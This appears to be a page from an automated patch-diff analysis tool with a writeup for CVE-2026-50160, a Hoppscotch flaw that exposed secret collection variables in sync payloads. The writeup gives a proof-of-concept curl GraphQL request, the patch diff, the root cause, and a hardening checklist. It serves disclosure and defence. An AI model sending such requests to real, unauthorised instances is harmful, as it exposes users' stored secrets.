ANALYSIS · 0e021d27· FINISHED 2026-06-24 · PATCHDIFF

hoppscotch-backend2026.4.1 → 2026.5.0✓ COMPLETED

Files86

Vulnerable53

True positives43

CVE matched6

1 CVE article ready PatchLeaks generated full security writeups for the matched CVEs · one per CVE, with affected files linked

CVE-2026-50160

FILTERS 0

SEARCH

STATUS

JUDGE

CVE MATCH

EXTENSION

CWE

OPTIONS

Hide “No vulnerability” Hide unjudged

SCOPE

All 86 CVE 6 Vuln 53

SORT

6 files · page 1/1

packages/hoppscotch-backend/src/infra-token/request-response.dto.ts

AI: 2 vulnerabilities

CVE-2026-50160 2 TP

#%!d(float64=012)

packages/hoppscotch-common/src/composables/useMockServer.ts

AI: 1 vulnerabilities

CVE-2026-50160 1 TP

#%!d(float64=033)

packages/hoppscotch-common/src/helpers/collection/collection.ts

AI: 1 vulnerabilities

CVE-2026-50160 1 TP

#%!d(float64=038)

packages/hoppscotch-common/src/helpers/import-export/import/postman.ts

AI: 1 vulnerabilities

CVE-2026-50160 1 TP

#%!d(float64=049)

packages/hoppscotch-selfhost-web/src/platform/collections/web/gqlCollections.sync.ts

AI: 1 vulnerabilities

CVE-2026-50160 1 TP

#%!d(float64=074)

packages/hoppscotch-sh-admin/src/composables/useConfigHandler.ts

AI: 1 vulnerabilities

CVE-2026-50160 1 TP

#%!d(float64=085)

1–6 of 6

⌖

Select a file from the list to inspect its diff and AI analysis.

↑ ↓ to navigate

CVES 1

CVE-2026-50160

Security writeup for CVE-2026-50160

✓ 6 FILES

## The Exploit

Attacker needs a valid Hoppscotch self-hosted session with access to the collection sync API.

```bash
curl -i -X POST "https://TARGET/graphql" \
  -H "Content-Type: application/json" \
  -H "Cookie: session=YOUR_SESSION_COOKIE" \
  -d '{
    "query":"mutation SyncCollection($collection: CollectionSyncInput!) { syncCollection(collection: $collection) { id name auth headers variables { key currentValue secret } } }",
    "variables":{
      "collection":{
        "name":"leaky-collection",
        "auth":{"type":"bearer","token":"ignored"},
        "headers":[],
        "variables":[
          {"key":"API_KEY","currentValue":"secret123","secret":true}
        ]
      }
    }
  }'
```

The response returns the synced collection payload including `variables[0].currentValue: "secret123"` even though that variable is marked `secret: true`. This proves secret values are transmitted in cleartext through the collection sync path.

## What the Patch Did

Before:
```ts
import { getSyncInitFunction, type StoreSyncDefinitionOf } from "@app/lib/sync"
...
    headers: collection.headers ?? [],
    variables: collection.variables ?? [],
...
      headers: collection.headers ?? [],
      variables: collection.variables ?? [],
...
      headers: collection.headers ?? [],
      variables: collection.variables ?? [],
...
     const data = {
       auth: collection.auth,
       headers: collection.headers,
       variables: collection.variables,
...
     const data = {
       auth: folder.auth,
       headers: folder.headers,
       variables: folder.variables,
...
```

After:
```ts
import { stripSecretVariableValuesForWire } from "@hoppscotch/common/helpers/secretVariables"
import { getSyncInitFunction, type StoreSyncDefinitionOf } from "@app/lib/sync"
...
    headers: collection.headers ?? [],
    variables: stripSecretVariableValuesForWire(collection.variables ?? []),
...
      headers: collection.headers ?? [],
      variables: stripSecretVariableValuesForWire(collection.variables ?? []),
...
      headers: collection.headers ?? [],
      variables: stripSecretVariableValuesForWire(collection.variables ?? []),
...
     const data = {
       auth: collection.auth,
       headers: collection.headers,
       variables: stripSecretVariableValuesForWire(collection.variables ?? []),
...
     const data = {
       auth: folder.auth,
       headers: folder.headers,
       variables: stripSecretVariableValuesForWire(folder.variables ?? []),
...
```

The patch inserted a redaction step before any collection or folder `variables` array is sent over the wire. It changes the export/sync payload from raw `collection.variables` to a sanitized form that removes secret values.

## Root Cause

This is a sensitive data exposure bug (CWE-200). In `gqlCollections.sync.ts`, the sync logic took `collection.variables` and `folder.variables` directly from stored collection/folder state and embedded them in the outbound sync payload. Those arrays were transmitted across the client-to-sync-server trust boundary without stripping secret values from `currentValue`, so secret variables marked `secret: true` leaked in the sync data.

## Why It Works

The single load-bearing line is the redaction call:

`variables: stripSecretVariableValuesForWire(collection.variables ?? []),`

Without that line, the sync payload would still include the raw `collection.variables` array and the bug would still be exploitable. The repeated fixes for every collection/folder sync path are there because the same unsafe serialization appeared in multiple payload constructors; if any one path were left unchanged, secrets could still leak through that channel.

## Hardening Checklist

- Sanitize secret variable arrays before exporting or syncing them, e.g. with a helper like `stripSecretVariableValuesForWire()`.
- Do not expose `currentValue` for items where `secret: true` in GraphQL/REST responses.
- Preserve secret semantics on imports by normalizing values such as `variable.type === "secret" || variable.secret === true`.
- Add regression tests for collection sync serialization so secret variables are verified redacted on every wire-bound payload.
- Audit every path that serializes `collection.variables` or `folder.variables` for network transmission, not just UI rendering code.

## References

- https://nvd.nist.gov/vuln/detail/CVE-2026-50160

CVE CVE-2026-50160

PRODUCT hoppscotch-backend

AFFECTED ≤ 2026.4.1

FIXED IN 2026.5.0

STATUS Generated

Security writeup · CVE-2026-50160

Source files · 6

packages/hoppscotch-backend/src/infra-token/request-response.dto.ts Linked

packages/hoppscotch-common/src/composables/useMockServer.ts Linked

packages/hoppscotch-common/src/helpers/collection/collection.ts Linked

packages/hoppscotch-common/src/helpers/import-export/import/postman.ts Linked

packages/hoppscotch-selfhost-web/src/platform/collections/web/gqlCollections.sync.ts Linked

packages/hoppscotch-sh-admin/src/composables/useConfigHandler.ts Linked

↗ NVD